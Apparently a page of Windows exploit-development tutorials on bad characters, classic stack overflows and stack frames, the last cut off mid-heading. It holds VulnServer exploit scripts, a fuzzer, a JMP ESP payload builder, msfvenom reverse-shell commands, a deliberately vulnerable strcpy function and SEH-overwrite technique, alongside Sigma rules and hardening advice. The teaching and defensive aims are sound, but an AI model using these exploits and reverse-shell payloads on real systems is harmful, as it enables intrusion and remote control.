Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.


1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

  • Missing bytes — characters stripped entirely by a sanitiser.
  • Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
  • Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.


Flow diagram showing how a raw payload passes through a string API and produces three failure modes: missing bytes, altered bytes, and premature truncation before reaching the destination buffer
Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.

2. Why \x00 Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

FunctionBehavior on \x00
strcpyStops copying at the first null
strncpyStops at null or n bytes
strlenReturns length up to first null
sprintfTerminates the formatted string
getsLegacy, present in old targets

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.


3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

ByteHexReason
Null\x00String terminator — always bad in string overflows
Line Feed\x0ANewline — terminates input in many protocol parsers
Carriage Return\x0DCR — terminates input lines (HTTP, SMTP, POP3)
Space\x20Whitespace delimiter — terminates tokens in some parsers
Form Feed\xFFCauses issues in some parsing contexts

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.


4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01\xFF block should appear contiguously in memory, typically at or near ESP.


5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>
  • !mona config sets the output directory.
  • !mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01\xFF) excluding the specified bad chars.
  • !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.


Cyclic flow diagram of the iterative bad-character elimination process: generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list, and repeat until the array is intact
Only the first byte of a corrupted run is confirmed bad — iterate the send-diff-eliminate loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.


Hierarchy diagram showing how a known bad-character set feeds into msfvenom which selects between shikata_ga_nai as default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, all producing encoded shellcode
msfvenom encoder selection is driven by the bad-char list — escalate through fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21\x7E printable range — ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.


9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

InstructionOpcode bytesNotes
JMP SHORT +6\xEB \x06\xEB often restricted
JE / JNE pair\x74 .. \x75 ..Two complementary branches always taken together
Near JMP\xE9 .. .. .. ..Alternative when \xEB is bad

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.


10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- every odd byte zeroed
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.


11. Common Attacker Techniques

TechniqueDescription
Bad-char enumerationInject \x01\xFF, diff memory, identify forbidden bytes
Shellcode encodingRe-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes
Alphanumeric shellcodealpha_mixed / Alpha2 for printable-only constraints
Jump substitutionReplace \xEB with JE/JNE pairs or near JMP
Venetian shellcodeSurvive Unicode expansion in wide-character buffers
Egghunter stagingSmall finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.


12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event IDNameRelevance
1Process CreationFrameworks (Metasploit, Empire) launching payloads
3Network ConnectionOutbound C2 from an exploited process
8CreateRemoteThreadPost-exploitation thread injection
10ProcessAccessCross-process open by injected payload
11FileCreateShellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high

Additional telemetry and hardening:

  • ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
  • Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
  • WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
  • Compiler mitigations/GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
  • Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
  • WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
  • Memory integrity — flag executable pages not backed by a known on-disk image.
  • Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Hierarchy diagram mapping an exploit attempt to four detection and mitigation layers: network WAF, OS mitigations like DEP and CFG, Sysmon Event ID 10 with unknown CallTrace, ETWTI injection telemetry, and Security Event 4688 process creation logging
Defence-in-depth layers each intercept exploitation at a different stage — encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

ToolDescriptionLink
Immunity DebuggerCrash analysis, ESP dump inspectionimmunityinc.com
mona.pyBytearray generation and memory comparisongithub.com/corelan
WinDbgOpcode/gadget inspection, memory diffingmicrosoft.com
msfvenomShellcode generation and encoding (-b)offsec.com
Alpha2Standalone alphanumeric shellcode encodergithub.com
x64dbgUser-mode debugging and patchingx64dbg.com
GhidraStatic opcode/disassembly analysisghidra-sre.org
VolatilityMemory forensics, unbacked code regionsvolatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Process crash bursts, EID 1 framework launches
Exploit Public-Facing ApplicationT1190WAF anomalies, service access violations
Exploitation for Privilege EscalationT1068Local overflow → elevated process behavior
Obfuscated Files or InformationT1027Encoder signatures (shikata/alpha) on disk/wire
Process InjectionT1055Sysmon EID 8/10, UNKNOWN in CallTrace

Summary

  • Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches EIP — you must enumerate them empirically, never assume.
  • \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
  • Enumerate with a \x01\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
  • Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
  • Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

Related Tutorials

References

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x000000000x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack SlotDescription
Function argumentsPushed by caller before CALL
Saved EIP (return address)Pushed implicitly by the CALL instruction
Saved EBPPushed by callee prologue (PUSH EBP)
/GS stack cookie (if present)Inserted between locals and saved EBP/EIP
Local variables / buffersAllocated by SUB ESP, N
ESP (stack top)Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.


Diagram of an x86 Windows stack frame showing the order from high to low address: function arguments, saved return EIP, saved EBP, GS cookie, local buffer, and ESP
A standard x86 cdecl stack frame — the saved return EIP sits just above EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

IdentifierWhat it does
strcpy, strcat, gets, sprintf, scanfUnsafe CRT functions with no bounds checking — classic root causes
memcpy(dst, src, count)Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break

Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e)       # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytesInstructionUse
FF E4JMP ESPClassic return trampoline
FF D4CALL ESPEquivalent effect
FF E5JMP EBPWhen EBP points near the buffer
EB 06Short JMP +6Next-SEH jump-over gadget

Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.


Flow diagram of the six-step Windows stack overflow exploit development methodology from fuzzing through payload construction
The exploit development loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

MitigationMechanismBypass vector (teaching)
/GS (stack cookie)Random DWORD cookie between locals and saved EBP/EIP; checked in epilogueSEH overwrite before the cookie check; cookie leak
SafeSEHPE table of valid SEH handlers; loader validates the handler before dispatchTrampoline in a module not compiled /SAFESEH
SEHOPValidates the SEH chain reaches FinalExceptionHandler at dispatchChain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT)Pages are W^X; the stack is non-executableROP chain (follow-on topic)
ASLR (/DYNAMICBASE)Randomizes image/stack/heap basePartial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.


Hierarchy diagram of Windows stack overflow mitigations including GS cookie, SafeSEH, SEHOP, DEP, and ASLR with compiler versus OS grouping
Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR) — each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.


Flow diagram showing the SEH-based stack overflow attack chain from buffer overflow through exception dispatch, POP-POP-RET gadget, and short jump into shellcode
Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline
!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

TechniqueDescription
Linear stack smashOverflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwriteOverwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampolineSource POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encodingEncode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / stagingUse a small first-stage to locate or download a larger payload
Post-exploit VirtualProtectMark injected memory executable to evade software DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

  • WER Event ID 1000 (Application Error, Application log) — logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
  • WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event IDNameRelevance
1Process CreationShells/payloads spawned from a crashed service
3Network ConnectionReverse-shell / C2 egress from shellcode
7Image LoadedUnexpected ws2_32.dll load by a non-network service
8CreateRemoteThreadThread injection by shellcode
10Process AccessShellcode calling OpenProcess on lsass.exe
11File CreatedDropped payloads / second-stage binaries
25Process TamperingProcess hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  condition: selection | count() > 3 by Application within 1m
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.T1190

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOPHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

ToolDescriptionLink
WinDbgKernel/user debugger; !exploitable crash triagemicrosoft.com
x64dbgUser-mode debugger for live frame inspectionx64dbg.com
mona.pyImmunity/WinDbg plugin for offsets, trampolines, bad charsgithub.com
pwntoolsPython exploit-dev framework (cyclic, p32)pwntools.com
ROPgadgetGadget discovery for DEP-bypass chainsgithub.com
GhidraStatic disassembly / decompilation for code reviewghidra-sre.org
SysmonEndpoint telemetry for post-exploitation behaviormicrosoft.com

11. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Exploit Public-Facing ApplicationT1190WER EventID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege EscalationT1068Service running as SYSTEM crashing then spawning children
Exploitation for Client ExecutionT1203Client app (parser/player) crash + child process via Sysmon EventID 1
Endpoint DoS: Application ExploitationT1499.004Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation)M1050DEP/ASLR/SEHOP//GS enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Related Tutorials

References

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.


1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.


2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

RegisterRole
RSP / ESPStack pointer — always points to the top (lowest address) of the current frame
RBP / EBPBase/frame pointer — anchors the frame in x86; in x64 not used for locals/args unless alloca() is used
RIP / EIPInstruction pointer — saved as the return address by CALL
RAXInteger/pointer return value (XMM0 for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

ConventionCleanupArgument Passing
__cdeclCaller cleansRight-to-left on stack
__stdcallCallee cleansRight-to-left on stack (Win32 API)
__fastcallCallee cleansFirst two in ECX/EDX, rest on stack
__thiscallCallee cleansC++ this in ECX, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];      // local buffer — classic overflow target
    strcpy(buf, src);  // bounded only by src
}
; x86 frame for vuln(), high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.


Diagram showing the x86 stack frame layout from higher to lower addresses: function arguments, return address, saved EBP, local variables, and the buffer at the top of ESP
A typical x86 stack frame: overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

